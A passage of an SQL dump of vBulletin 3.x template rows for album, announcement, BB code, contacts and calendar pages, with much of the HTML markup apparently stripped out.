(1238, -1, 'album_list', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[album_overview_before_latest]\r\n\r\n\".(($latestbits) ? (\"\r\n\r\n\r\n\".(($latest_pagenav) ? (\"\r\n\r\n\r\n $latest_pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'user_albums\'] AND $latestbits) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n$template_hook[album_overview_after_latest]\r\n\r\n\r\n\".(($show[\'user_albums\']) ? (\"\r\n
\r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[xs_albums]\", \"$userinfo[username]\") . \"\r\n \r\n \r\n\r\n $template_hook[album_overview_user_start_col]\r\n \r\n $vbphrase[album_title] \r\n $vbphrase[pictures] \r\n $vbphrase[last_picture] \r\n $template_hook[album_overview_user_end_column]\r\n \r\n\r\n\".(($albumbits) ? (\"\r\n $albumbits\r\n\") : (\"\r\n \r\n \r\n \".(($show[\'add_album_option\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=addalbum\\\">$vbphrase[click_here_add_album_upload_pictures] \r\n \") : (\"\r\n $vbphrase[this_user_has_no_albums]\r\n \")).\"\r\n \r\n \r\n\")).\"\r\n\r\n
\r\n\r\n\".(($show[\'add_album_option\'] OR $pagenav) ? (\"\r\n
\r\n\") : (\"\")).\"\r\n\") : (\"\")).\"\r\n
\r\n\r\n$template_hook[album_overview_after_user]\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n\r\n$vboptions[bbtitle] - $custompagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[album_overview_before_latest]\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[create_new_album] \r\n $vbphrase[recently_updated_albums] \r\n \r\n \r\n \r\n \r\n \r\n $latestbits\r\n
\r\n \r\n \r\n
\r\n\r\n\r\n\r\n\r\n $latest_pagenav \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n$template_hook[album_overview_after_latest]\r\n\r\n\r\n
\r\n\r\n\r\n \r\n $vbphrase[xs_albums] \r\n \r\n \r\n\r\n $template_hook[album_overview_user_start_col]\r\n \r\n $vbphrase[album_title] \r\n $vbphrase[pictures] \r\n $vbphrase[last_picture] \r\n $template_hook[album_overview_user_end_column]\r\n \r\n\r\n\r\n $albumbits\r\n \r\n \r\n \r\n \r\n $vbphrase[click_here_add_album_upload_pictures] \r\n \r\n $vbphrase[this_user_has_no_albums]\r\n \r\n \r\n \r\n \r\n\r\n
\r\n\r\n\r\n\r\n \r\n \r\n
\r\n\r\n$template_hook[album_overview_after_user]\r\n\r\n$footer\r\n\r\n', 'template', 1239881603, 'vBulletin Solutions', '3.8.3', 'vbulletin'),
(1239, -1, 'album_moderatedcomments', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n$picturecomment_css\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[picture_comments_awaiting_approval] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n$picturecomment_css\r\n$vboptions[bbtitle] - $vbphrase[picture_comments_awaiting_approval] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1208875399, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1240, -1, 'album_picturebit', '', '', 'template', 1217251223, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1241, -1, 'album_picturebit_checkbox', '', '', 'template', 1202834218, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'),
(1242, -1, 'album_picturebit_unread', '', '', 'template', 1202834531, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'),
(1243, -1, 'album_picturelist', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \" . construct_phrase(\"$vbphrase[xs_album_y]\", \"$userinfo[username]\", \"$albuminfo[title_html]\") . \" \r\n\".(($show[\'add_group_form\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n$vboptions[bbtitle] - $vbphrase[xs_album_y] \r\n\r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n$footer\r\n\r\n', 'template', 1217244680, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1244, -1, 'album_pictureview', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n$picturecomment_css\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \" . construct_phrase(\"$vbphrase[xs_album_y]\", \"$userinfo[username]\", \"$albuminfo[title_html]\") . \" - $vbphrase[picture] \r\n\r\n\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n
\r\n\r\n \r\n \r\n\r\n \" . construct_phrase(\"$vbphrase[picture_x_of_y_from_album_z]\", \"$pic_location[pic_position]\", \"$albuminfo[picturecount]\", \"$albuminfo[title]\") . \"\r\n \r\n \r\n\r\n \r\n \r\n \r\n session->vars[\'sessionurl\'] . \"albumid=$albuminfo[albumid]&pictureid=$pictureinfo[pictureid]\\\" alt=\\\"$pictureinfo[caption_censored]\\\" /> \r\n \r\n \".(($show[\'moderation\']) ? (\"$vbphrase[picture_waiting_moderator_approval] \") : (\"\")).\"\r\n \".(($pictureinfo[\'caption_html\']) ? (\"\r\n \r\n $pictureinfo[caption_html] \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \".(($show[\'edit_picture_option\'] OR $show[\'add_group_link\'] OR $show[\'reportlink\']) ? (\"\r\n \r\n \".(($show[\'edit_picture_option\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'add_group_link\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'reportlink\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n $vbphrase[picture_added] $pictureinfo[adddate] \".((!$show[\'detailedtime\']) ? (\"$pictureinfo[addtime] \") : (\"\")).\"\r\n \" . construct_phrase(\"$vbphrase[added_by_x]\", \"session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\\\">$userinfo[username] \") . \" \r\n \r\n \r\n \".(($show[\'picture_owner\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
\r\n \r\n \r\n
\r\n\r\n\".(($show[\'picture_nav\']) ? (\"\r\n
\r\n\") : (\"\")).\"\r\n\r\n$picturecomment_commentarea\r\n\r\n\".(($show[\'picturecomment_options\'] AND $show[\'picture_nav\']) ? (\"\r\n
\r\n\") : (\"\")).\"\r\n\r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n$picturecomment_css\r\n$vboptions[bbtitle] - $vbphrase[xs_album_y] - $vbphrase[picture] \r\n\r\n\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n
\r\n\r\n \r\n \r\n\r\n $vbphrase[picture_x_of_y_from_album_z] \r\n \r\n \r\n\r\n \r\n 400 $pictureinfo[width]\" cellpadding=\"$stylevar[cellpadding]\">\r\n \r\n \r\n \r\n $vbphrase[picture_waiting_moderator_approval] \r\n \r\n \r\n $pictureinfo[caption_html] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n $vbphrase[picture_added] $pictureinfo[adddate] $pictureinfo[addtime] \r\n $userinfo[username]\'>$vbphrase[added_by_x] \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n
\r\n \r\n \r\n\r\n$picturecomment_commentarea\r\n\r\n
\r\n \r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1218457442, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1245, -1, 'album_picture_edit', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[edit_pictures] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\".(($pagenav) ? (\"
$pagenav
\") : (\"\")).\"\r\n\r\n
\r\n\r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n$vboptions[bbtitle] - $vbphrase[edit_pictures] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n
$pagenav
\r\n\r\n
\r\n\r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1214219544, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1246, -1, 'album_picture_editbit', '\r\n\r\n ', '\r\n\r\n ', 'template', 1237551145, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1247, -1, 'album_picture_upload', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[upload_pictures] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n$errortable\r\n\r\n
\r\n\r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n$vboptions[bbtitle] - $vbphrase[upload_pictures] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n$errortable\r\n\r\n
\r\n\r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1208875637, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1248, -1, 'album_picture_uploadbit', '
', '
', 'template', 1192117003, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1249, -1, 'album_unreadcomments', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[unread_picture_comments] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n
\r\n\r\n $vbphrase[unread_picture_comments] \r\n \r\n\r\n $picturebits \r\n \r\n
\r\n\r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n$vboptions[bbtitle] - $vbphrase[unread_picture_comments] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n
\r\n\r\n $vbphrase[unread_picture_comments] \r\n \r\n\r\n $picturebits \r\n \r\n
\r\n\r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1200331012, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1250, -1, 'announcement', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[announcements_in_forum] : $foruminfo[title_clean] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n$spacer_close\r\n\r\n\r\n$announcebits
\r\n\r\n\r\n$spacer_open\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n $forumjump \r\n \r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vboptions[bbtitle] - $vbphrase[announcements_in_forum] : $foruminfo[title_clean] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n$spacer_close\r\n\r\n\r\n$announcebits
\r\n\r\n\r\n$spacer_open\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n $forumjump \r\n \r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1195729864, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1251, -1, 'announcement_edit', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \".(($show[\'editing_mode\']) ? (\"$vbphrase[edit_announcement]\") : (\"$vbphrase[post_new_announcement]\")).\" \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'editing_mode\']) ? (\"\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n \r\n \".(($show[\'editing_mode\']) ? (\"\r\n $vbphrase[announcement] session->vars[\'sessionurl\'] . \"a=$announcementinfo[announcementid]\\\">$announcementinfo[title] \r\n $vbphrase[edit_announcement]\r\n \") : (\"\r\n $vbphrase[post_new_announcement]\r\n \")).\"\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $usernamecode\r\n\r\n \r\n
\r\n $vbphrase[forum]: \r\n $forum_options \r\n
\r\n \r\n\r\n \r\n
\r\n $vbphrase[title]: \r\n \r\n
\r\n \r\n\r\n \r\n
$vbphrase[message]:
\r\n $messagearea\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \r\n
\r\n $vbphrase[start_date] / $vbphrase[end_date] \r\n \r\n \r\n \r\n\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n\r\n \".(($show[\'editing_mode\']) ? (\"\r\n
\r\n $vbphrase[reset_views_counter] \r\n
\r\n \") : (\"\")).\"\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vboptions[bbtitle] - $vbphrase[edit_announcement] $vbphrase[post_new_announcement] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, 0)\">\r\n\r\n\r\n \r\n \r\n $vbphrase[announcement] $announcementinfo[title] \r\n $vbphrase[edit_announcement]\r\n \r\n $vbphrase[post_new_announcement]\r\n \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $usernamecode\r\n\r\n \r\n
\r\n $vbphrase[forum]: \r\n $forum_options \r\n
\r\n \r\n\r\n \r\n
\r\n $vbphrase[title]: \r\n \r\n
\r\n \r\n\r\n \r\n
$vbphrase[message]:
\r\n $messagearea\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \r\n
\r\n $vbphrase[start_date] / $vbphrase[end_date] \r\n \r\n \r\n \r\n\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[reset_views_counter] \r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208880816, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1252, -1, 'bbcode_code', '\r\n
$vbphrase[code]:
\r\n
$code \r\n
', '\r\n
$vbphrase[code]:
\r\n
$code \r\n
', 'template', 1164202755, 'vBulletin Solutions', '3.6.4', 'vbulletin'),
(1253, -1, 'bbcode_code_printable', '\r\n
$vbphrase[code]:
\r\n
$code
\r\n
', '\r\n
$vbphrase[code]:
\r\n
$code
\r\n
', 'template', 1136596081, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1254, -1, 'bbcode_html', '\r\n
$vbphrase[html_code]:
\r\n
$code \r\n
', '\r\n
$vbphrase[html_code]:
\r\n
$code \r\n
', 'template', 1164202759, 'vBulletin Solutions', '3.6.4', 'vbulletin'),
(1255, -1, 'bbcode_html_printable', '\r\n
$vbphrase[html_code]:
\r\n
$code
\r\n
', '\r\n
$vbphrase[html_code]:
\r\n
$code
\r\n
', 'template', 1136596090, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1256, -1, 'bbcode_php', '\r\n
$vbphrase[php_code]:
\r\n
\r\n \r\n $code\r\n
\r\n
\r\n
', '\r\n
$vbphrase[php_code]:
\r\n
\r\n \r\n $code\r\n
\r\n
\r\n
', 'template', 1164202763, 'vBulletin Solutions', '3.6.4', 'vbulletin'),
(1257, -1, 'bbcode_php_printable', '\r\n
$vbphrase[php_code]:
\r\n
\r\n
\r\n
\r\n \r\n $code\r\n
\r\n
\r\n
\r\n
\r\n
', '\r\n
$vbphrase[php_code]:
\r\n
\r\n
\r\n
\r\n \r\n $code\r\n
\r\n
\r\n
\r\n
\r\n
', 'template', 1136596100, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1258, -1, 'bbcode_quote', '\r\n
$vbphrase[quote]:
\r\n
\r\n \r\n \r\n \".(($show[\'username\']) ? (\"\r\n \r\n $message
\r\n \") : (\"\r\n $message\r\n \")).\"\r\n \r\n \r\n
\r\n
', 'width: 100%;\">\r\n
$vbphrase[quote]:
\r\n
\r\n \r\n \r\n \r\n \r\n
$vbphrase[originally_posted_by_x] \r\n
\r\n
\r\n $message
\r\n \r\n $message\r\n \r\n \r\n \r\n
\r\n
', 'template', 1149092965, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1259, -1, 'bbcode_quote_printable', '\r\n
$vbphrase[quote]:
\r\n
\r\n \r\n \r\n \r\n \".(($show[\'username\']) ? (\"\r\n \r\n \" . construct_phrase(\"$vbphrase[originally_posted_by_x]\", \"$username\") . \"\r\n \".(($postid) ? (\"\" . construct_phrase(\"($vbphrase[post_x])\", \"$postid\") . \"\") : (\"\")).\"\r\n
\r\n $message
\r\n \") : (\"\r\n $message\r\n \")).\"\r\n \r\n \r\n \r\n
\r\n
', 'width: 100%;\">\r\n
$vbphrase[quote]:
\r\n
\r\n \r\n \r\n \r\n \r\n \r\n
$vbphrase[originally_posted_by_x] \r\n
($vbphrase[post_x]) \r\n
\r\n $message
\r\n \r\n $message\r\n \r\n \r\n \r\n \r\n
\r\n
', 'template', 1142532097, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1260, -1, 'BUDDYLIST', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vbphrase[contacts] - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" \r\n session->vars[\'sessionurl\'] . \"do=buddylist&buddies=$buddies\\\" />\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n $vbphrase[contacts] \r\n \r\n\r\n -- $vbphrase[online] -- \r\n \r\n$onlineusers\r\n\r\n -- $vbphrase[offline] -- \r\n \r\n$offlineusers\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\".(($show[\'playsound\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vbphrase[contacts] - $vboptions[bbtitle] \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n $vbphrase[contacts] \r\n \r\n\r\n -- $vbphrase[online] -- \r\n \r\n$onlineusers\r\n\r\n -- $vbphrase[offline] -- \r\n \r\n$offlineusers\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n', 'template', 1196779217, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1261, -1, 'buddylistbit', '\r\n session->vars[\'sessionurl\'] . \"u=$buddy[userid]\\\" target=\\\"_blank\\\"> \r\n \".(($show[\'highlightuser\']) ? (\"$buddy[username] \") : (\"$buddy[username]\")).\" \r\n \r\n \r\n', '\r\n $vbphrase[x_is_y]\" border=\"0\" /> \r\n $buddy[username] $buddy[username] \r\n \r\n \r\n', 'template', 1073078450, 'vBulletin Solutions', '', 'vbulletin'),
(1262, -1, 'CALENDAR', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[calendar] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n
\r\n \r\n $calendarinfo[title] \r\n\r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n
\r\n\r\n \".((!$show[\'popups\']) ? (\"\r\n
\r\n
\r\n \") : (\"\")).\"\r\n\r\n
\r\n\r\n\".(($show[\'popups\']) ? (\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'weeklydisplay\']) ? (\"\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'monthlydisplay\']) ? (\"\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'yearlydisplay\']) ? (\"\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n$HTML\r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[calendar] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n
\r\n \r\n $calendarinfo[title] \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n
\r\n\r\n
\r\n \r\n \r\n \r\n\r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n$HTML\r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1195729864, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1263, -1, 'calendarjump', '\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n \r\n $vbphrase[jump_to_month] \r\n \r\n $vbphrase[january] \r\n $vbphrase[february] \r\n $vbphrase[march] \r\n $vbphrase[april] \r\n $vbphrase[may] \r\n $vbphrase[june] \r\n $vbphrase[july] \r\n $vbphrase[august] \r\n $vbphrase[september] \r\n $vbphrase[october] \r\n $vbphrase[november] \r\n $vbphrase[december] \r\n \r\n \r\n $yearbits\r\n $gobutton\r\n
\r\n \r\n\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n \r\n \r\n $vbphrase[calendar_jump] \r\n \r\n \r\n $jumpcalendarbits\r\n \r\n $gobutton\r\n
\r\n ', '\r\n\r\n \r\n \r\n \r\n $vbphrase[jump_to_month] \r\n \r\n $vbphrase[january] \r\n $vbphrase[february] \r\n $vbphrase[march] \r\n $vbphrase[april] \r\n $vbphrase[may] \r\n $vbphrase[june] \r\n $vbphrase[july] \r\n $vbphrase[august] \r\n $vbphrase[september] \r\n $vbphrase[october] \r\n $vbphrase[november] \r\n $vbphrase[december] \r\n \r\n \r\n $yearbits\r\n $gobutton\r\n
\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[calendar_jump] \r\n \r\n \r\n $jumpcalendarbits\r\n \r\n $gobutton\r\n
\r\n ', 'template', 1125699134, 'vBulletin Solutions', '3.5.0 Release Candidate 3', 'vbulletin'),
(1264, -1, 'calendarjumpbit', ' $jumpcalendartitle \r\n\r\n', ' $jumpcalendartitle \r\n\r\n', 'template', 1040219143, 'vBulletin Solutions', '', 'vbulletin'),
(1265, -1, 'calendar_edit', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'deleteoption\']) ? (\"\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'additional_options\']) ? (\"\r\n \r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(this.title.value, 0)\">\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n', 'template', 1208875602, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1266, -1, 'calendar_edit_customfield', '\r\n $custom[title] \r\n \r\n \".(($show[\'customdescription\']) ? (\"\r\n
$custom[description]
\r\n \") : (\"\")).\"\r\n
\r\n \".(($show[\'customoptions\']) ? (\"\r\n \r\n \r\n $selectbits\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'customoptionalinput\']) ? (\"\r\n \".(($show[\'customoptions\']) ? (\"$vbphrase[or]:\") : (\"\")).\"\r\n \r\n \") : (\"\")).\"\r\n
\r\n
\r\n \r\n', '\r\n $custom[title] \r\n \r\n
\r\n $custom[description]
\r\n \r\n
\r\n \r\n \r\n \r\n $selectbits\r\n \r\n \r\n \r\n $vbphrase[or]: \r\n \r\n \r\n
\r\n
\r\n \r\n', 'template', 1164208051, 'vBulletin Solutions', '3.6.4', 'vbulletin'),
(1267, -1, 'calendar_edit_recurrence', '\r\n $vbphrase[recurrence_pattern] \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n
$vbphrase[daily]
\r\n
\r\n
\r\n\r\n \r\n \r\n
$vbphrase[daily]
\r\n
\r\n
\r\n\r\n \r\n \r\n
$vbphrase[monthly]
\r\n
\r\n
\r\n\r\n \r\n
$vbphrase[yearly]
\r\n
\r\n
\r\n\r\n\r\n \r\n \r\n
\r\n \r\n\r\n', '\r\n $vbphrase[recurrence_pattern] \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n
$vbphrase[daily]
\r\n
\r\n
\r\n\r\n \r\n \r\n
$vbphrase[daily]
\r\n
\r\n
\r\n\r\n \r\n \r\n
$vbphrase[monthly]
\r\n
\r\n
\r\n\r\n \r\n
$vbphrase[yearly]
\r\n
\r\n
\r\n\r\n\r\n \r\n \r\n
\r\n \r\n\r\n', 'template', 1217585761, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1268, -1, 'calendar_manage', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n$_logincode\r\n\r\n\r\n\r\n \".(($show[\'delete\']) ? (\"$vbphrase[delete_event]\") : (\"$vbphrase[move_event]\")).\" \r\n \r\n\r\n $vbphrase[event] : $eventinfo[title] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n$_logincode\r\n\r\n\r\n\r\n $vbphrase[delete_event] $vbphrase[move_event] \r\n \r\n\r\n $vbphrase[event] : $eventinfo[title] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n$footer\r\n\r\n', 'template', 1208875485, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
